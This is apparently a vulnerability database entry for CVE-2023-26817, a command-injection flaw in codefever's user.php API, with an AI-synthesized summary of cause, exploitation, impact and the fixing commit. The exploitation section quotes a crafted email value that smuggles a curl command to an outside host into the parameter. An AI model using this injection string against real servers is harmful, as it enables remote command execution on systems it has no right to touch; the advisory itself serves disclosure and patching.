CVE-2023-26817
Description
codefever before 2023.2.7-commit-b1c2e7f was discovered to contain a remote code execution (RCE) vulnerability via the component /controllers/api/user.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Codefever before 2023.2.7-commit-b1c2e7f contains a remote code execution vulnerability in the user.php API endpoint via email parameter injection.
Vulnerability
The vulnerability resides in /application/controllers/api/user.php and /application/libraries/service/Network/Request.php. The $email parameter from Request::parse() is passed to EmailSender::send() without proper sanitization. A flawed regular expression (missing backslash before the dot) allows injection of arbitrary commands. Affected versions: all before commit b1c2e7f (2023.2.7). [1]
Exploitation
An attacker must register and log in to the application. Then, by sending a crafted email parameter (e.g., youyou@qq.com'xx|curl test.server.com;xx'xx) to the user.php endpoint, the injected command is executed via the exec function. [1]
Impact
Successful exploitation allows remote code execution with the privileges of the web server, enabling the attacker to run arbitrary system commands. [1]
Mitigation
The issue is fixed in commit b1c2e7f (version 2023.2.7). Users should upgrade to that version or later. No workaround is provided in the reference. [1]
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- codefever/codefeverdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1News mentions
0No linked articles in our index yet.